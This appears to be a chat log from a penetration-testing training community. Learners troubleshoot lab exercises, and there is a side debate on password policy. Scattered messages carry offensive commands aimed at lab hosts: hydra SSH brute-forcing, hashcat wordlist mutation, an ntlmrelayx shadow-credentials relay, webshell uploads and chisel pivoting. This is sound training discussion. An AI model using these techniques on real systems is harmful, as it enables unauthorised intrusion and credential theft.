I get the sentiment but it seems rather misguided to me
MFA is also an essential thing in this age
because in reality, people don't use good passwords. they are too lazy and pick convenience over security. it's why you see so much password re-use, why you have dumb passwords like summer2019, 2020, etc.
even MFA is often implemented in ways that are NOT actually MFA
how do you realistically do MFA if you, say, brick your authenticator and now it's impossible to restore
sure, but people can use strong passwords and, better yet, we can secure even weak passwords with minimal effort
when you generate MFA the program also gives the "In case of emergency, use these" backup codes
which is advised to store in a secure/encrypted location
but they won't. have you ever supported any user in IT? lmao. they hate long/convoluted/rotating passwords etc.
but now you're back to square one of having a password that can bypass the Multi factor
yes and they don't need to be long or convoluted
that's sorta my point, that's a bit of an old and somewhat uninformed model of pw security
but to them anything not in rockyou.txt is long and convoluted
Hey, I tried out doing the macos fundamentals module, and am I supposed to have access to a Mac somewhere? I only see the pwnbox. Is there something I'm missing?
rotating passwords is actually bad for security
yep
big asterisk on that one too actually, even though generally it's true
it forces people into those patterns
there's a question asking to query what version it is, so I'm assuming i should have access to an environment, but i don't see one. (I have never used academy). Can someone point me in the right direction?
because people often cycle through password1, password2, password3 [password 1 fell off], password1
the only thing that can be extended is the pw box not the target machine
i already know the answer to the question and i can ssh if i wanted to, but it annoys me that i did not find it myself
apologies if this is a stupid question
above the question: there should be a spawn target button
yes, rotation can and will cause people to use poor patterns, but that doesn't necessarily make it a bad thing inherently, and there are plenty of places where rotating passwords is not the net-negative a lot of people believe it is
there's also the intro to academy module which i highly recommend so you get used to it
There is no such button
Hybrid solution? You have your password[0] + the company rotates you a note with your new password[1] and you combine these. So the PW keeps changing but you only worry about 1 of them yourself and no repetition
the words "spawn target" do not appear anywhere on the page
i'd read the section is it expecting you to use the pwnbox?
what module/section is this?
there's nothing in the pwnbox related to macos
OH
graphical interface section of macos fundamentals
it's asking you to give the version of mac running
there is no Mac
okay so how would it have the specific version number if i'm supposed to bring my own Mac
I'm not so sure this would solve the issues that it might seem to, especially in the envs where rotation may end up being a net positive thing.
upon inspecting the list of passwords generated with cupp.py, my pass is indeed in the generated list and so is my username in the username list.
it's simply taking too long to brute force it
it probably just accepts any macos version
lol
or press the hint button haha
the question could be updated as versions release
not buying an apple product just to do this module
doesn't mean the user updated their mac though
lol
it pays to read the module summary ¯\_(ツ)_/¯
you can use a VM
if you can find a MacOS image
though sharing that would not be legal
I guess yeah I've never actually tried setting up a macos VM
could be good though, why not
not to mention: you'd have terrible performance
^^
is it not straightforward?
I have tried virtualising mac
considering Mac is designed for ARM processors; and most systems are AMD processors
it's a mac... ofc it's gonna be slow
if you're running a Mac on Mac hardware it's fine
the issue lies in using hardware not designed to run a Mac
imo contact support and see if they can give you a refund for the cubes
Macs are designed to run on a separate set of chipset instructions entirely
nah im going to virtualize it
have fun with 1 minute per frame
surely its not literally that bad
let me break it down; your vm is needing to translate hardware instructions from a different CPU chipset to another instruction set for a different type of CPU
I was very excited to have a mac vm but I deleted it in less than 5 minutes. It really is that bad (at least back when I tried it)
i guess ill get to see how bad it is lol
just buy a mac brother. look at it as an investment in to your future self.
Good luck
unless they release a MacOS compatible with the AMD chipset
didn't they do a short thing with Intel, or did Intel provide them with ARM chipsets
Mac didn't use arm, only very recently. But couldn't you sidestep this issue by compiling for the system architecture anyway
I am guessing there are ways to run mac on non mac hardware efficiently (the hackintosh community would know better) but it wasn't worth the effort for me
sounds like some ricing is in the mix there
intel+arm --> m1
old OS versions and potentially a few modded drivers iirc
and a subset of specifically supported hardware
It isn't worth it for most people at that extent
yeah, especially if you want recent OS support
you can get some 4x ARM processors for free from oracle if you need arm for some reason (server)
you can also rent apple systems in the cloud
yeah was about to suggest that
there's a handful of providers that offer essentially Mac minis as a service
ok is that a joke but.. why would
maybe for rendering? Adobe always fucks windows with crashes
testing and some assorted work like that yeah
I personally know a few app devs who use it for XCode
If a client pays you well and also compensates the server fees, why not?
yep
if you wanted to continue the crafted pw related discussion in there, i'm happy to elaborate on that as needed
though i might have covered your original question already
module - PASSWORD ATTACKS
section - Pass the Ticket (PtT) from Windows
I can't connect to my target using rdp.
[15:54:10:675] [4651:4652] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[15:54:10:675] [4651:4652] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[15:54:10:077] [4651:4652] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[15:54:10:077] [4651:4652] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[15:54:10:077] [4651:4652] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[15:54:10:077] [4651:4652] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
wrap the password in single quotes
$$ is a variable call to get the PID of the current shell
Thank you!
whenever a password or something contains special characters always wrap it
this sounds like something you should message/email support about my dude
Removing the message as it leaks your IP (doesn't matter if you are using a VPN or whatever)
Thanks, I didn't think this through
my friend is also on the same boat btw
like if you're just casually browsing, you get throttled
I cannot even use the chatbot
Hey all, can I DM someone regarding this question?
Visit the URL "https://127.0.0.1:8889/app/index.html#/search/all" and log in using the credentials: admin/password. After logging in, click on the circular symbol adjacent to "Client ID". Subsequently, select the displayed "Client ID" and click on "Collected". Initiate a new collection and gather artifacts labeled as "Windows.KapeFiles.Targets" using the _SANS_Triage configuration. Lastly, examine the collected artifacts and enter the name of the scheduled task that begins with 'A' and concludes with 'g' as your answer.
Ive spent the last 45 minutes just trying to set the configuration for the Hunt, really frustrating for a simple question - Lab is taking 10 seconds for anything to respond
hello, I'm having so many difficulties in skills assessment I of the AD enum & attacks module due to pivoting. i can't transfer chisel to the webshell so i can pivot and rdp to MS01
i also escaped the webshell and got a rev shell but nothing seems to work to transfer the files
the only thing i could do is netsh and then rdp, but I'm limited to using a lot of tools
any help please?
why can't you transfer?
Colleagues, I am doing the WPA/WPA2 password cracking module exercise, but when converting the capture file so that hashcat can read it I get an error with the tool cap2hccapx.bin, which tells me packagesCaptured.pcapng: Invalid pcap header. How can I convert the captured packets another way?
i get error when trying to directly upload chisel to webshell, in the revshell i tried smb, invokewebrequest after launching the uploadserver in my attack host
Hi everyone! Pls help me with the task in the NTLM Relay Attacks module - Advanced NTLM Relay Attacks Targeting Kerberos section. The task is to relay cjaq's HTTP NTLM authentication over LDAP to create shadow credentials for the jperez user. I'm following the instructions presented in the section but the relay doesn't work. ntlmrelayx outputs: connection from INLANEFREIGHT.LOCAL\CJAQ@172.16.117.60 controlled, but there are no more targets left. Smb and http servers are OFF in responder.conf respectively
but whenever i do wget its gives me error and chisel doesnt transfer
also tried the other methods but it doesn't seem to work
what's the error? did you set up the web server right?
if I remember right you need to use hashcat v6.1.1
what about the other side
also tried python3 -m http-server but didnt work
hcxpcapngtool
the other side give no error whatever command you put in
so you probably can't say what's happening under the commands i write in ps
reset the lab, you should be able to transfer with the webshell itself
i'll restart it again for the 10th time, i did lose a lot of time yesterday and now I'm still stuck there lol
with the upload file in the webshell itself ?
yep
both that and wget works, done it lots of times
you might be doing something wrong
i don't think so, at least when trying to upload the files, every other file seems to transfer well, such as rubeus and powerview
but when it comes to chisel specifically ... it crashes
Hello chat, I'm trying to do "Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?" at the INTRO TO ASSEMBLY LANGUAGE. But when I download the gdb.zip file i just find a gdb file which is.. the debugger, not the binary to analyze, isn't it? So.. what do i debug?
and i get this error
don't remember running into this, are you supposed to relay to .60? isn't it supposed to be targeting DC if it's ldap?
the file is called gdb but it's an ELF binary
run file gdb and it will tell you what it is
Yea I'm relaying to DC - ntlmrelayx.py -t ldap://INLANEFREIGHT.LOCAL\CJAQ@172.16.117.3 --shadow-credentials --shadow-target jperez <snip> . I'm running commands right from the section materials and it doesn't work (weird..)
Connection comes from 172.16.117.60
save it to a different dir, /users/public maybe
yep
i transferred it via invokewebrequest in my revshell
in different directory and worked
thanks man you always give me good assistance
i completed the xss final assessment and got the final flag and it's correct. is there any more type of xss in this challenge that i can perform to test my skill in xss
let me test this out
Thank you very much! Just completed it
This breaks one's head when you don't understand things
hey XreOus can u tell me from where did you get the chisel.exe , mine doesn't work idk why , it throws an error : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
wait i think i know why
did you coerce?
never used it before lmao
is it easy to use?
i can't transfer the whole chisel directory, i transfer just the executable and the chisel command fails
hands down the best pivot tool
you only need the exe
from where you did download it?
maybe I'm transferring some wrong chisel lol
i need to take a look on this tool then
github, there's precompiled binaries
searched there but only found the chisel github page provided by HTB
there's no chisel.exe should i download the windows version and unzip it
transferring ... hope it works
bruuuh finalllyy hahahaha
lets goo thank you man a lott
Nope, I missed it in the instructions in the section… Following the instructions I'll coerce a connection from the computer account, am I right? Don't u mind if I ask you in DM?
yeah
I don't really have much to add, just follow the steps in the module
you can coerce from any account, doesn't have to be a machine account
Maybe someone who passed this module in chat can help?
huh? I have done it
are you having trouble with the question or the lab environment?
I was having issues with the lab being incredibly slow but ended up getting there after over an hour. I just wanted to cross check what I was doing was on the right track
if the lab is slow try switching VPN location
hey for brute forcing i don't find a sam password
and i made this order hydra ssh://10.129.82.96 -l sam -P mut_password.list but nothing :/
Hello guys i need help,
Module : Shell & Payloads
Section: Web Shell - Antak Webshell
my problem : I uploaded my file to the system, but it asks for a username and password to log in, I cannot find this login information.
i tried htb-student but it didn't work
cp /usr/share/nishang/Antak-WebShell/antak.aspx upload_antak.aspx
and user : htb-student password : htb-student
into upload_antak.aspx
before uploading the file modify this section
im trying thanks
it works thanks
anyone needing some help on Bypassing CSRF Tokens via CORS Misconfigurations can dm me, glad to help... tricky exercise
anyone for my problem ?
anybody interested in studying for OSCP dm me
@haughty stirrup
Did you find the answer? I have the same issue
i mean they were working on the skill exam for that module last i checked
so unless they skipped it
the powershell command is correct; you can specify the group name in the "Identity" field btw
instead of *
the reason it appears like it's freezing is because it's searching the user's rights over every identity in the Domain
Ah i see, i got it, thanks a lot. Is there a way i can see this in bloodhound?
not that I can think of off the top of my head
the Info you get from BH is the generic term for the rights abuse
I see, but that should not matter too much for the attack itself right?
well as you'll see when you retrieve the info, it's not as black/white as you think
there's a specific reason it has you retrieve that right info
Ok, that's good enough for me right now. I will keep going and see if i got it. Thanks for the help so far
it can take a few minutes to get the info
so don't be discouraged by it taking a while
patience is the name of the game
i need help for my problem plz https://academy.hackthebox.com/module/147/section/1391
Title : Web Cache Poisoning
Try to use what you learned in this section to poison the cache and obtain the admin user's password. NOTE: The lab may take a couple of minutes to start up. Use the local vhost interactsh.local to exfiltrate data (refer to the Password Reset Poisoning section for more details). The cache expires after 2 minutes, so if you accidentally cached an incorrect payload, wait for 2 minutes until the cache expires.
I am stuck on this question, should we use any script or should I solve it by making changes on the host address and X-Host: please help
Don't attack ssh
Have another look in the module. It explains how you can poison the cache
smb ?
scan the target for open services
i scan i find smb and ftp but always nothing
well attack one of those
it'll be almost 1000x better than attacking ssh
I know what they're working on, and it's not anonymous logins
this is the password attacks module
specifically the password mutations section, where you're tasked with creating the mutated wordlist then bruteforcing sam's password
would anyone help me with the "Rapid Triage Examination & Analysis Tools" section of the SOC analyst path? I'm stuck since almost a week with the first question on determining the new name of uninstall.exe with zone.identifier information.
as i said i attacked but nothing happened
your password list is incorrect
i use `hashcat --force Password-Attacks/password.list -r custom-rule --stdout | sort -u > password.list`
yes
you're meant to ALSO use the custom.rule from the password-attacks resources
not the weird little ruleset they demonstrate in the section
ahhh
the full wordlist is 94044 words long
wait
also save it to a mut_password.list
as the section demonstrates the command should be outputting to a mut_password.list
it also helps others determine your issues if you use the convention set by the module
I use custom rules in the section, I think that's why it doesn't work.
In the password attacks hard lab any clue on getting in the target. They only give us an target ip no other details here
start with the beginning, enumerate
read #rules
again you're meant to use the custom.rules from the resources
there's a custom.rules in the Password-attacks.zip
Guys, I need help with the "Getting Started" module, can't login via ssh, every time I try, I get "permission denied (publickey)"
I'm using a VPN based connection to learn privately on my kali-linux and it is successfully connected
thx a lot
@proud crane For help with your social media account, please contact the corresponding support team. Anything else is illegal and will not be tolerated here
well, permission denied (publickey) means that the intended method is an rsa key, if you're doing the section that gives you a public ip and port you need to specify the given port with -p
I'll just start right from the 1st Tier 0 module and continue accordingly
I guess I need every bit of knowledge fr
The getting-started module is (relatively) basic
If you provide the section name you can get more help by providing more info on what you're doing
It's because your private key doesn't have the necessary permission
Did you chmod +600 id_rsa?
If the key didn't have the right permissions there'd be a different error entirely
Comrades, I need help. I don't understand the question because I don't see the hash as such, or I don't understand what it asks for --> What is the cleartext password value for the NetNTLMv2 hash?
You're meant to crack the hash that you get
I think the hash to be obtained is the one in the example as such or am I wrong ?
The method to obtain it is from the examples
It also helps if you inform us which module and section you're working on
Most of the time however, it's read and follow the methods from the section
Targeting the spawned target
Skills Assessment --> cracking passwords with hashcat
Then use whatever method you learned to obtain the hash
Then crack it
Skill assessments don't generally use the same info as the examples
But the methods are the same
If I'm looking at the notes and they get the hash from a sqladmin and the method starts there, then that's where I say what my starting point is
Thanks
I hadn't read the scenario as such
I have tried to edit the sshd_config file, still nothing
Skill assessments, and the sections as a whole, are generally separate
Not necessary
What section are you doing?
None of the sections in the getting-started module require editing the sshd_config file [or for you to run ssh on your device]
@fathom pendant It's just that I hadn't read the scenario as such of the exercise you propose, so I got lost and I went back to review the syllabus and I had the hash to decipher and I found the answer
Getting Started
That's the module name
Privilege Escalation exercise requires me to login to an external user using ssh and get a flag
Is it giving you a public ip and port?
As I said earlier
You need to specify the port
Yeah and it also gives me the username and password to login to the ssh
Ssh defaults to port 22 if you don't specify the port
it's normal that it's been 2 hours and you haven't found anything, do you have this amount of time?
Shouldn't take more than 30 minutes
Try with less threads
And/or restart the lab
ok i try it
Hey, looking for advice on the nibbles initial foothold in the getting started module. Still pretty new at this. I am able to upload my payload as if it were an image but cannot get NetCat to successfully connect to my reverse shell. I have made sure that my php script is exactly the same as the example in the lesson except have replaced the ip address with my VPN tun0 address. Been at this for a couple hours now and could use some help.
Port 22 is the only running port shown that is running ssh when I scanned the target
It's not
And you don't need to scan it
You are given an ip and port to use
But the instruction does not include the port
The instructions only tell you the port if its static
Since this module uses a public docker container, it's using a specific port which it gives you
Ip:port
To specify the port with ssh you need to add -p
if it's Getting Started - Privilege Escalation, it does tell you to use the port
Also yea
SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above.
Just checked
I will try that when I'm back with my computer
Alright, I guess I'm not too careful